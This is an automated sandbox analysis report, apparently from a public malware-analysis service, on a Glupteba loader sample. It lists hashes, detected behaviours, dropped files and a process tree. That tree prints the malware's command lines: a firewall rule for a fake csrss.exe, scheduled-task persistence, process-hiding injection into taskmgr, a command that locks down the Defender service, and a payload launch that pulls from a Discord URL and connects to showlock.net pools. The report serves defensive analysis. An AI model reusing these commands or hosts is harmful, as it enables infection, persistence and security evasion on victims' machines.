Analysis

  • max time kernel
    249s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16/05/2024, 23:16

General

  • Target

    63c31a30a3351afad28e50a369c057bc86d1b86f1ae7a2531376ad888a837167.exe

  • Size

    4.1MB

  • MD5

    1ea717b0789c3552328cca197a5d8d24

  • SHA1

    2ea67320a7edd1814111893b4006557d13af055d

  • SHA256

    63c31a30a3351afad28e50a369c057bc86d1b86f1ae7a2531376ad888a837167

  • SHA512

    307060d55859211a5f7612fa2d4363b86b446b086d05b6132bdc220379a4fe8558c32ecb395e145eac13973ef7e493d4f0434a42a0c974f26c66c21e5b717fe0

  • SSDEEP

    98304:o4jpljXL0mhlLBWmpAPZQz52v/2t7cg620TCsdq:Hfj4m5WmaZQ12vOT6xno

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 31 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 4 IoCs
  • UPX packed file 20 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\63c31a30a3351afad28e50a369c057bc86d1b86f1ae7a2531376ad888a837167.exe
    "C:\Users\Admin\AppData\Local\Temp\63c31a30a3351afad28e50a369c057bc86d1b86f1ae7a2531376ad888a837167.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3368
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2916
    • C:\Users\Admin\AppData\Local\Temp\63c31a30a3351afad28e50a369c057bc86d1b86f1ae7a2531376ad888a837167.exe
      "C:\Users\Admin\AppData\Local\Temp\63c31a30a3351afad28e50a369c057bc86d1b86f1ae7a2531376ad888a837167.exe"
      2⤵
      • Windows security bypass
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4644
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:372
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:4816
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2084
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1896
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Manipulates WinMonFS driver.
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4908
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Command and Scripting Interpreter: PowerShell
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5036
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2352
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:3936
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2412
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:420
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:96
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:4188
          • C:\Windows\windefender.exe
            "C:\Windows\windefender.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:808
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4300
              • C:\Windows\SysWOW64\sc.exe
                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                • Launches sc.exe
                • Suspicious use of AdjustPrivilegeToken
                PID:4524
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Command and Scripting Interpreter: PowerShell
            PID:4744
          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
            4⤵
              PID:3116
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:2464
            • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
              4⤵
                PID:4184
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                4⤵
                • Command and Scripting Interpreter: PowerShell
                PID:768
              • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                4⤵
                  PID:952
          • C:\Windows\windefender.exe
            C:\Windows\windefender.exe
            1⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            PID:3788

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iysczzkl.yqh.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

            Filesize

            2.0MB

            MD5

            1bf850b4d9587c1017a75a47680584c4

            SHA1

            75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

            SHA256

            ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

            SHA512

            ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

            Filesize

            2.8MB

            MD5

            713674d5e968cbe2102394be0b2bae6f

            SHA1

            90ac9bd8e61b2815feb3599494883526665cb81e

            SHA256

            f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

            SHA512

            e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

            Filesize

            2.0MB

            MD5

            dcb505dc2b9d8aac05f4ca0727f5eadb

            SHA1

            4f633edb62de05f3d7c241c8bc19c1e0be7ced75

            SHA256

            61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

            SHA512

            31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

            Filesize

            281KB

            MD5

            d98e33b66343e7c96158444127a117f6

            SHA1

            bb716c5509a2bf345c6c1152f6e3e1452d39d50d

            SHA256

            5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

            SHA512

            705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            1c19c16e21c97ed42d5beabc93391fc5

            SHA1

            8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

            SHA256

            1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

            SHA512

            7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            957f74e00ed47e1da44bb259e220577e

            SHA1

            0287b7bdd15e813902ad582731b71519ccf71efc

            SHA256

            8a388e4826ea3e439b89fe011f76bd60612332e77656d604e4c45bd92617eea4

            SHA512

            880add910820afeabd5f28140c397a2aa34f1385a9d287bb5dcf1451a95acebb2eb22710c042d15517f2af13a39c04f14ef1e66d49e10be10f5f2be4628798eb

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            8cf0b42502a0e243d020fdd9aa5ca1cc

            SHA1

            2b47a36a56db530b8b7e79a9c2593b51fd2eda9c

            SHA256

            609d9926a175c345d0913d2b5f8116da5f06a5a1ee04e9fab2326fe1f841d282

            SHA512

            c472f2ee2ab86138406c13efa6116f848b981ad753b79b0fcdaa13386b0981ec489e935c45ca3f47ba3fff65593d7323cf666d41767466e19c5003636b9091d9

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            bee3e357afa874bcd8e5efd90d8b68b4

            SHA1

            46971db0e1521de57e835d2598c0bfe75070b448

            SHA256

            3f107af8ca8a15ed5ddd3516b272628018e796a484c2749b0cf2c4034b7823bc

            SHA512

            e723c6c6c70d24c4c54cc28b9c1e99c88bebacfedff82a392e29f47bfa2eabe12e98fcbd53768b93acbac2e650e51c99ee4019cf34a1c62501b05fa7c9e810fd

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            f19093f788e30f447103b2e51473229b

            SHA1

            bcd1f2bcbce75a1a59e42fa152a2d98e55185ee4

            SHA256

            b83909c8db82ede1cf84c9e67ef01426e7dfbad1bbfa4913eaa2b22d789af621

            SHA512

            40e66927e92d4dc0cee2bc9abc1db031bdf4435df2cad2a82fe141deab114d6a546b366e37c2fe022cbad76daaca246aee46a96a9b19f2f7ff5c70b4ff662589

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            ae3a58226e5c8e074cec88fa54bd5585

            SHA1

            aeefc0bb8bedb19730231caf6ec03de4483b8f95

            SHA256

            6c7700996312f7df821b543622b012783645a760a780c5426744efe7454ff85c

            SHA512

            3a0abb53e6b361fbe3f4ce3e8700db3add909df439cc929cb72c76a9768e94ef83226f4e8033ebc7728b8a4af0d974a6cc016744be61bb7efc7246af12316bb8

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            f9f7ae79ee5e926577b7527f86016c28

            SHA1

            c3ec709766016a9fe7731030f0e43f2e04dd20e9

            SHA256

            4b756efba1a6abd9e65c14d2418f172b6aa2c9eaf3a6f6de569e609de97acab1

            SHA512

            232a371be98e5c72e33deae29a723feca1d72698df9ed5cd5a511e88763f9f81f68a3ba953d5cdc389322de6e96f4cd8edc64613e16c470bbc1522b340e164a2

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            9800dad8f2ac2a5b804ef5b1ee282344

            SHA1

            2ca168f8bbebbe33ec7b40ad7bf411ab7c4a36bb

            SHA256

            33e39b799b3bede95159522eaad5a38f9b7a26fbc2afdba44ab87ad26a6db3df

            SHA512

            aa0f98d6674393178bacfc9ad952e15aa0fe2693d9e4e71bd7f233cb5b3a2c3c937b44ef33b42551fb34ced71c5c6ddd092433afaccecd9d07c90442aee71f85

          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            18KB

            MD5

            710d839dfacfc07cdfbb4f2a7b9548f2

            SHA1

            0ad72b8e4feb7e6b0f35b009c7970a078101ff92

            SHA256

            412cfc6dd6a0c8d65e9c18d90572f8bcd28f9ef1d77f677d3c7e9e82b2fdbf25

            SHA512

            aafdd2d9ae650a6b0f7ce7e949750173ac13bfd13efe4dc3c9ac19754ca7a2a45d1f9631d7b3b9c73ed99872a9678d2ec18abbd156b407b741949f1fe5c2f803

          • C:\Windows\rss\csrss.exe

            Filesize

            4.1MB

            MD5

            1ea717b0789c3552328cca197a5d8d24

            SHA1

            2ea67320a7edd1814111893b4006557d13af055d

            SHA256

            63c31a30a3351afad28e50a369c057bc86d1b86f1ae7a2531376ad888a837167

            SHA512

            307060d55859211a5f7612fa2d4363b86b446b086d05b6132bdc220379a4fe8558c32ecb395e145eac13973ef7e493d4f0434a42a0c974f26c66c21e5b717fe0

          • C:\Windows\windefender.exe

            Filesize

            2.0MB

            MD5

            8e67f58837092385dcf01e8a2b4f5783

            SHA1

            012c49cfd8c5d06795a6f67ea2baf2a082cf8625

            SHA256

            166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

            SHA512

            40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

          • memory/420-1527-0x0000000070630000-0x0000000070980000-memory.dmp

            Filesize

            3.3MB

          • memory/420-1526-0x00000000705E0000-0x000000007062B000-memory.dmp

            Filesize

            300KB

          • memory/420-1506-0x0000000007990000-0x0000000007CE0000-memory.dmp

            Filesize

            3.3MB

          • memory/768-2309-0x00000000704F0000-0x000000007053B000-memory.dmp

            Filesize

            300KB

          • memory/768-2289-0x0000000007EF0000-0x0000000008240000-memory.dmp

            Filesize

            3.3MB

          • memory/768-2310-0x0000000070560000-0x00000000708B0000-memory.dmp

            Filesize

            3.3MB

          • memory/808-1752-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/808-1750-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/952-2527-0x0000000000400000-0x00000000008E8000-memory.dmp

            Filesize

            4.9MB

          • memory/952-2539-0x0000000000400000-0x00000000008E8000-memory.dmp

            Filesize

            4.9MB

          • memory/952-2531-0x0000000000400000-0x00000000008E8000-memory.dmp

            Filesize

            4.9MB

          • memory/952-2535-0x0000000000400000-0x00000000008E8000-memory.dmp

            Filesize

            4.9MB

          • memory/1896-804-0x0000000070730000-0x000000007077B000-memory.dmp

            Filesize

            300KB

          • memory/1896-805-0x0000000070780000-0x0000000070AD0000-memory.dmp

            Filesize

            3.3MB

          • memory/2012-1021-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/2084-545-0x00000000078D0000-0x0000000007C20000-memory.dmp

            Filesize

            3.3MB

          • memory/2084-565-0x0000000070730000-0x000000007077B000-memory.dmp

            Filesize

            300KB

          • memory/2084-566-0x00000000707A0000-0x0000000070AF0000-memory.dmp

            Filesize

            3.3MB

          • memory/2412-1285-0x00000000705E0000-0x000000007062B000-memory.dmp

            Filesize

            300KB

          • memory/2412-1286-0x0000000070650000-0x00000000709A0000-memory.dmp

            Filesize

            3.3MB

          • memory/2412-1291-0x0000000009400000-0x00000000094A5000-memory.dmp

            Filesize

            660KB

          • memory/2412-1266-0x0000000007E50000-0x0000000007E9B000-memory.dmp

            Filesize

            300KB

          • memory/2412-1264-0x00000000078A0000-0x0000000007BF0000-memory.dmp

            Filesize

            3.3MB

          • memory/2464-2068-0x0000000070540000-0x0000000070890000-memory.dmp

            Filesize

            3.3MB

          • memory/2464-2067-0x00000000704F0000-0x000000007053B000-memory.dmp

            Filesize

            300KB

          • memory/2916-84-0x0000000009E00000-0x0000000009E94000-memory.dmp

            Filesize

            592KB

          • memory/2916-15-0x0000000007BF0000-0x0000000007C0C000-memory.dmp

            Filesize

            112KB

          • memory/2916-82-0x0000000009BE0000-0x0000000009C85000-memory.dmp

            Filesize

            660KB

          • memory/2916-6-0x000000007390E000-0x000000007390F000-memory.dmp

            Filesize

            4KB

          • memory/2916-76-0x0000000070660000-0x00000000709B0000-memory.dmp

            Filesize

            3.3MB

          • memory/2916-7-0x0000000006760000-0x0000000006796000-memory.dmp

            Filesize

            216KB

          • memory/2916-77-0x0000000009B80000-0x0000000009B9E000-memory.dmp

            Filesize

            120KB

          • memory/2916-9-0x0000000006DD0000-0x00000000073F8000-memory.dmp

            Filesize

            6.2MB

          • memory/2916-73-0x0000000009BA0000-0x0000000009BD3000-memory.dmp

            Filesize

            204KB

          • memory/2916-74-0x0000000070610000-0x000000007065B000-memory.dmp

            Filesize

            300KB

          • memory/2916-277-0x0000000009D60000-0x0000000009D7A000-memory.dmp

            Filesize

            104KB

          • memory/2916-75-0x0000000073900000-0x0000000073FEE000-memory.dmp

            Filesize

            6.9MB

          • memory/2916-282-0x0000000009D40000-0x0000000009D48000-memory.dmp

            Filesize

            32KB

          • memory/2916-300-0x0000000073900000-0x0000000073FEE000-memory.dmp

            Filesize

            6.9MB

          • memory/2916-8-0x0000000073900000-0x0000000073FEE000-memory.dmp

            Filesize

            6.9MB

          • memory/2916-10-0x0000000007490000-0x00000000074B2000-memory.dmp

            Filesize

            136KB

          • memory/2916-66-0x0000000008D50000-0x0000000008DC6000-memory.dmp

            Filesize

            472KB

          • memory/2916-35-0x0000000008C90000-0x0000000008CCC000-memory.dmp

            Filesize

            240KB

          • memory/2916-16-0x00000000081A0000-0x00000000081EB000-memory.dmp

            Filesize

            300KB

          • memory/2916-83-0x0000000073900000-0x0000000073FEE000-memory.dmp

            Filesize

            6.9MB

          • memory/2916-14-0x0000000007780000-0x0000000007AD0000-memory.dmp

            Filesize

            3.3MB

          • memory/2916-13-0x0000000073900000-0x0000000073FEE000-memory.dmp

            Filesize

            6.9MB

          • memory/2916-12-0x0000000007530000-0x0000000007596000-memory.dmp

            Filesize

            408KB

          • memory/2916-11-0x0000000007710000-0x0000000007776000-memory.dmp

            Filesize

            408KB

          • memory/3116-2043-0x0000000000400000-0x00000000008E1000-memory.dmp

            Filesize

            4.9MB

          • memory/3116-2047-0x0000000000400000-0x00000000008E1000-memory.dmp

            Filesize

            4.9MB

          • memory/3368-302-0x0000000002D80000-0x000000000366B000-memory.dmp

            Filesize

            8.9MB

          • memory/3368-301-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/3368-2-0x0000000002D80000-0x000000000366B000-memory.dmp

            Filesize

            8.9MB

          • memory/3368-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/3368-1-0x0000000002970000-0x0000000002D74000-memory.dmp

            Filesize

            4.0MB

          • memory/3788-1759-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/3788-1753-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/3788-1755-0x0000000000400000-0x00000000008DF000-memory.dmp

            Filesize

            4.9MB

          • memory/4184-2286-0x0000000000A00000-0x00000000012CD000-memory.dmp

            Filesize

            8.8MB

          • memory/4184-2542-0x0000000000A00000-0x00000000012CD000-memory.dmp

            Filesize

            8.8MB

          • memory/4184-2534-0x0000000000A00000-0x00000000012CD000-memory.dmp

            Filesize

            8.8MB

          • memory/4184-2530-0x0000000000A00000-0x00000000012CD000-memory.dmp

            Filesize

            8.8MB

          • memory/4184-2538-0x0000000000A00000-0x00000000012CD000-memory.dmp

            Filesize

            8.8MB

          • memory/4644-306-0x0000000008270000-0x00000000085C0000-memory.dmp

            Filesize

            3.3MB

          • memory/4644-307-0x0000000008750000-0x000000000879B000-memory.dmp

            Filesize

            300KB

          • memory/4644-326-0x0000000070730000-0x000000007077B000-memory.dmp

            Filesize

            300KB

          • memory/4644-327-0x0000000070780000-0x0000000070AD0000-memory.dmp

            Filesize

            3.3MB

          • memory/4644-332-0x0000000009CA0000-0x0000000009D45000-memory.dmp

            Filesize

            660KB

          • memory/4744-1801-0x0000000008920000-0x000000000896B000-memory.dmp

            Filesize

            300KB

          • memory/4744-1820-0x00000000704F0000-0x000000007053B000-memory.dmp

            Filesize

            300KB

          • memory/4744-1826-0x0000000009E90000-0x0000000009F35000-memory.dmp

            Filesize

            660KB

          • memory/4744-1821-0x0000000070540000-0x0000000070890000-memory.dmp

            Filesize

            3.3MB

          • memory/4744-1799-0x00000000084F0000-0x0000000008840000-memory.dmp

            Filesize

            3.3MB

          • memory/4908-1766-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1758-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1796-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1794-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1792-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1790-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1788-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1774-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1772-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1770-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1768-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1778-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1764-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1762-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1760-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1776-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1756-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1754-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1745-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1780-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-2540-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-2528-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1782-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1784-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-2532-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-2536-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/4908-1786-0x0000000000400000-0x0000000000D1C000-memory.dmp

            Filesize

            9.1MB

          • memory/5036-1026-0x0000000008010000-0x0000000008360000-memory.dmp

            Filesize

            3.3MB

          • memory/5036-1028-0x00000000084C0000-0x000000000850B000-memory.dmp

            Filesize

            300KB

          • memory/5036-1047-0x0000000070690000-0x00000000706DB000-memory.dmp

            Filesize

            300KB

          • memory/5036-1053-0x0000000009A40000-0x0000000009AE5000-memory.dmp

            Filesize

            660KB

          • memory/5036-1048-0x00000000706E0000-0x0000000070A30000-memory.dmp

            Filesize

            3.3MB